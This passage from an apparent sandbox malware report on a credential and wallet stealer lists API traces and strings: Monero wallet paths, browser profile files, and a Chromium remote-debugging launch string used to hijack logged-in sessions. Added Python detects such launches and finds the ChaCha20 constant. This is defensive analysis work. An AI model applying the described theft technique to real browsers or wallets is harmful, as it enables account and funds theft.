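The decoded values are what an analyst wants from these four functions: the VirtualAlloc/VirtualFree pair moves exactly 399,000,000 bytes (0x17C841C0) of MEM_COMMIT|MEM_RESERVE PAGE_READWRITE memory, GlobalMemoryStatusEx is called with dwLength 0x40 (sizeof MEMORYSTATUSEX), and VirtualAllocExNuma asks for 0x7D0 bytes of PAGE_EXECUTE_READWRITE memory from the current process. As listed, the VirtualAlloc function carries no ExitProcess of its own, so the script reports it as a probe without a fail-closed exit rather than guessing at the caller.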
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,006D0B32,006D0B2F,00000000,?,?,?,006D1450,006D0B2E), ref: 006BBEC5
                                  • StrCmpCA.SHLWAPI(?,006D1454), ref: 006BBF33
                                  • StrCmpCA.SHLWAPI(?,006D1458), ref: 006BBF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BC8A9
                                  • FindClose.KERNEL32(000000FF), ref: 006BC8BB
                                  Strings
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 006BC3B2
                                  • Preferences, xrefs: 006BC104
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 006BC495
                                  • Brave, xrefs: 006BC0E8
                                  • \Brave\Preferences, xrefs: 006BC1C1
                                  • Google Chrome, xrefs: 006BC6F8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 006BC534
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 9c77fc0a416041900065266834fbe0b7643a41c3a1b044c10ee6e39210588322
                                  • Instruction ID: 5a64bbfff8fcbc003a586c8df078b7464152c7a7e2fe57b937513b7ea00b9a63
                                  • Opcode Fuzzy Hash: 9c77fc0a416041900065266834fbe0b7643a41c3a1b044c10ee6e39210588322
                                  • Instruction Fuzzy Hash: A85210B291010C5BCB54FBA0DD96FFE737EAF54304F40459DB50A66191EE30AB48CBAA
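The String ID of this block (`--remote-debugging-port=9229 --profile-directory="` next to Brave, Google Chrome and Preferences) is the command line the sample assembles to start a Chromium browser with the DevTools protocol listening on a TCP port and an existing user profile loaded; once the browser is up, session data can be pulled through the browser itself rather than decrypted from the database on disk. The Python below is a detection example added to this report, not code from the sample or from Joe Sandbox. It parses constructed process-creation records (Sysmon Event ID 1 field names, made-up values) and flags Chromium launches that enable remote debugging, treating one that also selects an existing profile directory as the stealer pattern. The browser image list and that heuristic are assumptions to tune; legitimate automation normally points the switch at a fresh --user-data-dir instead.

```python
import re
from typing import Dict, List, Optional

# Chromium-based browsers that honour --remote-debugging-port. Brave and Google Chrome
# are named in the report's strings; the rest are an assumption for this example.
CHROMIUM_IMAGES = {"chrome.exe", "brave.exe", "msedge.exe", "opera.exe", "vivaldi.exe"}

# Constructed process-creation records (Sysmon Event ID 1 field names, made-up values).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\file.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r'--remote-debugging-port=9229 --profile-directory="Default" --headless'},
    {"Image": r"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\file.exe",
     "CommandLine": r'"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" '
                    r'--remote-debugging-port=9229 --profile-directory="Profile 1"'},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"'},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                    r'--remote-debugging-port=9222 --user-data-dir=C:\Temp\puppeteer_dev_profile'},
]

# One Chromium switch: --name or --name=value, the value optionally double-quoted.
_SWITCH = re.compile(r'--(?P<name>[a-z0-9-]+)(?:=(?P<val>"[^"]*"|\S+))?', re.IGNORECASE)


def parse_switches(cmdline: str) -> Dict[str, Optional[str]]:
    """Return {switch: value} for a Chromium command line; valueless switches map to None."""
    out: Dict[str, Optional[str]] = {}
    for m in _SWITCH.finditer(cmdline):
        val = m.group("val")
        if val is not None and len(val) >= 2 and val[0] == '"' and val[-1] == '"':
            val = val[1:-1]
        out[m.group("name").lower()] = val
    return out


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Flag a Chromium launch that exposes the DevTools protocol.

    Automation frameworks normally pair the switch with a fresh --user-data-dir. A launch
    that instead selects an existing --profile-directory (as the sample's string does)
    hands the caller the logged-in session of that profile, so it is marked suspicious.
    Heuristic chosen for this example, not a documented rule.
    """
    image = _basename(ev["Image"])
    if image not in CHROMIUM_IMAGES:
        return None
    sw = parse_switches(ev["CommandLine"])
    if "remote-debugging-port" not in sw and "remote-debugging-pipe" not in sw:
        return None
    profile = sw.get("profile-directory")
    return {
        "browser": image,
        "parent": _basename(ev["ParentImage"]),   # reported for triage, not used by the rule
        "port": sw.get("remote-debugging-port"),
        "profile": profile,
        "headless": "headless" in sw,
        "suspicious": profile is not None and "user-data-dir" not in sw,
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run analyze_event over a batch of records and keep the hits."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

On the constructed records, both launches spawned by file.exe are reported as suspicious, the plain profile launch from explorer.exe produces nothing, and the node.exe launch with a throwaway --user-data-dir is reported but not marked suspicious. The port number itself is not used as a signal: 9229 is what this sample's string contains, but nothing stops another build from choosing a different one.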
                                  APIs
                                  • wsprintfA.USER32 ref: 006C3B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C3B33
                                  • lstrcat.KERNEL32(?,?), ref: 006C3B85
                                  • StrCmpCA.SHLWAPI(?,006D0F58), ref: 006C3B97
                                  • StrCmpCA.SHLWAPI(?,006D0F5C), ref: 006C3BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C3EB7
                                  • FindClose.KERNEL32(000000FF), ref: 006C3ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: e8e9dd17a4656230bbdc6ba843a1b9aeba53762d333b331278f012c266ba5ae3
                                  • Instruction ID: 4d1376953473026115d4f62f0719afa94ca23e757a325ffcb4cc6207d7ccdb6b
                                  • Opcode Fuzzy Hash: e8e9dd17a4656230bbdc6ba843a1b9aeba53762d333b331278f012c266ba5ae3
                                  • Instruction Fuzzy Hash: CDA130B2A142189BDB74DFA4DC85FFAB379EB48300F54858DB60D96281DB709B84CF61
                                  APIs
                                  • wsprintfA.USER32 ref: 006C4B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C4B93
                                  • StrCmpCA.SHLWAPI(?,006D0FC4), ref: 006C4BC1
                                  • StrCmpCA.SHLWAPI(?,006D0FC8), ref: 006C4BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C4DCD
                                  • FindClose.KERNEL32(000000FF), ref: 006C4DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: afc5fd0998d5176d0dc1e7384589db28b8bf4069c2c95e58d840e1176c6f6d41
                                  • Instruction ID: 6ee3e6885fe5cf017a05c1d3a7141425b5d45e17a218fd454c775b380e3a2ce4
                                  • Opcode Fuzzy Hash: afc5fd0998d5176d0dc1e7384589db28b8bf4069c2c95e58d840e1176c6f6d41
                                  • Instruction Fuzzy Hash: 7E614AB2914118ABDB20EBE0DC95FEAB37DEB48700F40458DF60A96151EF70EB849F95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006C47D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C47D7
                                  • wsprintfA.USER32 ref: 006C47F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C480D
                                  • StrCmpCA.SHLWAPI(?,006D0FAC), ref: 006C483B
                                  • StrCmpCA.SHLWAPI(?,006D0FB0), ref: 006C4851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C48DB
                                  • FindClose.KERNEL32(000000FF), ref: 006C48F0
                                  • lstrcat.KERNEL32(?,0147E988), ref: 006C4915
                                  • lstrcat.KERNEL32(?,0147DC40), ref: 006C4928
                                  • lstrlen.KERNEL32(?), ref: 006C4935
                                  • lstrlen.KERNEL32(?), ref: 006C4946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: ae91174808f7178a3cd8e74856ce74056fb9fae91e5db86ecb7021f2ac4b7b75
                                  • Instruction ID: 3df6a50165de8e1d96d7d69e8ddc77e73e83ae1ed3f4d1ea5abb6b05f3c16f53
                                  • Opcode Fuzzy Hash: ae91174808f7178a3cd8e74856ce74056fb9fae91e5db86ecb7021f2ac4b7b75
                                  • Instruction Fuzzy Hash: 565175B1914218ABC760EBB0DC99FE9B37DEB58300F40458CB60996250EE74DB84DFA1
                                  APIs
                                  • wsprintfA.USER32 ref: 006C4113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006C412A
                                  • StrCmpCA.SHLWAPI(?,006D0F94), ref: 006C4158
                                  • StrCmpCA.SHLWAPI(?,006D0F98), ref: 006C416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006C42BC
                                  • FindClose.KERNEL32(000000FF), ref: 006C42D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: e2e3127b895898e96dab90b3227c46ab4bb4e9a9bbb634a61f8a1b4bb7a32354
                                  • Instruction ID: 050d92354585af3234659e8134717855b0c04a87a27c753730caa7956344e1e2
                                  • Opcode Fuzzy Hash: e2e3127b895898e96dab90b3227c46ab4bb4e9a9bbb634a61f8a1b4bb7a32354
                                  • Instruction Fuzzy Hash: 515184B2914218ABCB24EBB0DC95FFAB37DFB48300F00458DB61A96150EB74EB848F54
                                  APIs
                                  • wsprintfA.USER32 ref: 006BEE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 006BEE55
                                  • StrCmpCA.SHLWAPI(?,006D1630), ref: 006BEEAB
                                  • StrCmpCA.SHLWAPI(?,006D1634), ref: 006BEEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BF3AE
                                  • FindClose.KERNEL32(000000FF), ref: 006BF3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 9ca8bac4c412a3069332fcd14c933ff70c5d4ce00913aca8b2c61c4e8e3a7b89
                                  • Instruction ID: 6359393b02f0eb954a65662a963a5d185e885cefaa2f36e6debcf44e59920bc9
                                  • Opcode Fuzzy Hash: 9ca8bac4c412a3069332fcd14c933ff70c5d4ce00913aca8b2c61c4e8e3a7b89
                                  • Instruction Fuzzy Hash: D9E1EE7291111C5ADB94EBA0DCA2FFE733AAF54304F4045DDB50A62152EE30AF89CF59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: 6e9e8b619082839fc2598f149eda27dab5dc0eba28c400e653c58197c446e622
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: 57E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
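The String ID of this block is the 16-byte constant `expand 32-byte k`, listed in pieces (`expa`, `nd 3`, `2-by`, `te k`) because the code loads it as four 32-bit immediates rather than referencing one string. That constant is the sigma of Salsa20 and ChaCha20: it fills state words 0 to 3 in ChaCha20 (words 0, 5, 10 and 15 in Salsa20), so finding it marks one of those ciphers, not which one and not what the sample encrypts with it; the report does not say. The Python below is an added example, not code from the sample or from Joe Sandbox: a scanner that finds the constant in a memory image both as a contiguous string and as split immediates (run on a constructed byte string, not the real dump), and an RFC 8439 ChaCha20 block function that shows where the words sit in the state, checked against the RFC's block-function test vector.

```python
import struct
from typing import List, Tuple

MASK32 = 0xFFFFFFFF
SIGMA = b"expand 32-byte k"                 # the constant the report shows in four pieces
SIGMA_WORDS = struct.unpack("<4I", SIGMA)   # (0x61707865, 0x3320646e, 0x79622d32, 0x6b206574)


def find_sigma(blob: bytes) -> List[Tuple[int, str]]:
    """Locate the Salsa20/ChaCha20 constant in a memory image.

    Returns (offset, kind) pairs: 'contiguous' for the 16-byte string as one data object,
    'immediate:<n>' for word n found on its own, which is how a compiler emits the constant
    when the state is initialised with 32-bit mov instructions.
    """
    hits: List[Tuple[int, str]] = []
    pos = blob.find(SIGMA)
    while pos != -1:
        hits.append((pos, "contiguous"))
        pos = blob.find(SIGMA, pos + 1)
    covered = {h[0] + i for h in hits for i in range(16)}   # skip words inside a full copy
    for n in range(4):
        word = SIGMA[4 * n:4 * n + 4]
        pos = blob.find(word)
        while pos != -1:
            if pos not in covered:
                hits.append((pos, f"immediate:{n}"))
            pos = blob.find(word, pos + 1)
    return sorted(hits)


def _rotl(v: int, c: int) -> int:
    return ((v << c) | (v >> (32 - c))) & MASK32


def _quarter_round(s: List[int], a: int, b: int, c: int, d: int) -> None:
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha20_initial_state(key: bytes, counter: int, nonce: bytes) -> List[int]:
    """RFC 8439 state layout: sigma, 8 key words, 32-bit counter, 3 nonce words."""
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("ChaCha20 needs a 32-byte key and a 12-byte nonce")
    return (list(SIGMA_WORDS) + list(struct.unpack("<8I", key))
            + [counter & MASK32] + list(struct.unpack("<3I", nonce)))


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """RFC 8439 block function: 20 rounds over the state, then add the initial state back."""
    init = chacha20_initial_state(key, counter, nonce)
    s = init[:]
    for _ in range(10):
        _quarter_round(s, 0, 4, 8, 12); _quarter_round(s, 1, 5, 9, 13)
        _quarter_round(s, 2, 6, 10, 14); _quarter_round(s, 3, 7, 11, 15)
        _quarter_round(s, 0, 5, 10, 15); _quarter_round(s, 1, 6, 11, 12)
        _quarter_round(s, 2, 7, 8, 13); _quarter_round(s, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & MASK32 for x, y in zip(s, init)])


def constant_positions(state: List[int]) -> List[int]:
    """Indices of a 16-word state holding sigma words: [0,1,2,3] for ChaCha20, [0,5,10,15] for Salsa20."""
    return [i for i, w in enumerate(state) if w in SIGMA_WORDS]


# Constructed memory image (not from the sample): zero padding, the constant loaded as four
# 32-bit immediates (mov dword ptr [ebp+disp8], imm32 encodings, C7 45 xx), NOP padding,
# then one contiguous copy as a data object.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"\xc7\x45\xc0" + SIGMA[0:4] + b"\xc7\x45\xc4" + SIGMA[4:8]
    + b"\xc7\x45\xc8" + SIGMA[8:12] + b"\xc7\x45\xcc" + SIGMA[12:16]
    + b"\x90" * 17
    + SIGMA
    + b"\xff" * 8
)

if __name__ == "__main__":
    for off, kind in find_sigma(SAMPLE_DUMP):
        print(f"{off:#06x} {kind}")
    print(chacha20_block(bytes(range(32)), 1, bytes.fromhex("000000090000004a00000000")).hex())
```

The scanner reports four immediates at the constructed offsets and one contiguous copy; a real dump of this sample's 006DC000 region should be searched the same way to tell whether the constant is sitting in code (immediates) or in initialised data. On the RFC 8439 section 2.3.2 inputs (key bytes 00..1f, counter 1, nonce 000000090000004a00000000) the block begins 10f1e7e4d13b5915500fdd1fa32071c4, which is the expected value from the RFC.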
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006D16B0,006D0D97), ref: 006BF81E
                                  • StrCmpCA.SHLWAPI(?,006D16B4), ref: 006BF86F
                                  • StrCmpCA.SHLWAPI(?,006D16B8), ref: 006BF885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BFBB1
                                  • FindClose.KERNEL32(000000FF), ref: 006BFBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 5a2de7d7be70258b3be4e122fc28d609aab599087874901d805ced85cedbb5fc
                                  • Instruction ID: 672f3c79ee419e7b8cbb3d6590ae1471831e4a6e3961bb9b3fdc1121313291fb
                                  • Opcode Fuzzy Hash: 5a2de7d7be70258b3be4e122fc28d609aab599087874901d805ced85cedbb5fc
                                  • Instruction Fuzzy Hash: A4B12071A101189BCB64FBA0DDA6FFD737AEF54304F0085ADA50A56191EF30AB48CB96
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006D523C,?,?,?,006D52E4,?,?,00000000,?,00000000), ref: 006B1963
                                  • StrCmpCA.SHLWAPI(?,006D538C), ref: 006B19B3
                                  • StrCmpCA.SHLWAPI(?,006D5434), ref: 006B19C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006B1D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 006B1E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006B1E60
                                  • FindClose.KERNEL32(000000FF), ref: 006B1E72
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: aaaa040bdbe6bd7897b28b18e81591781d6f06411aefcc15e7652d432a535209
                                  • Instruction ID: 4fd8495a0f4724b5513f27ed4cfe655ad7c8e89bb7627e36b43e20013b30c717
                                  • Opcode Fuzzy Hash: aaaa040bdbe6bd7897b28b18e81591781d6f06411aefcc15e7652d432a535209
                                  • Instruction Fuzzy Hash: 7C12A77191011CABCB59EBA0DCA6FFE737AEF54304F4045DDA10A66191EE30AF88CB65
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006D0C32), ref: 006BDF5E
                                  • StrCmpCA.SHLWAPI(?,006D15C0), ref: 006BDFAE
                                  • StrCmpCA.SHLWAPI(?,006D15C4), ref: 006BDFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 006BE4E0
                                  • FindClose.KERNEL32(000000FF), ref: 006BE4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                   • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 9b6aeba8b4afa71ae6bae4a21323f76eaae3caf2b0a6fe5cb921a34d94f36ec0
                                  • Instruction ID: a61a10cb8384d1a370d4d1313d840a688b1fec673c533aeb80bf6b559c736903
                                  • Opcode Fuzzy Hash: 9b6aeba8b4afa71ae6bae4a21323f76eaae3caf2b0a6fe5cb921a34d94f36ec0
                                  • Instruction Fuzzy Hash: D0F1A87192411C9ACB55EBA0DCA5FFEB33AEF54304F4045DEA10A62191EE306F89CF69
                                  APIs
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006D15A8,006D0BAF), ref: 006BDBEB
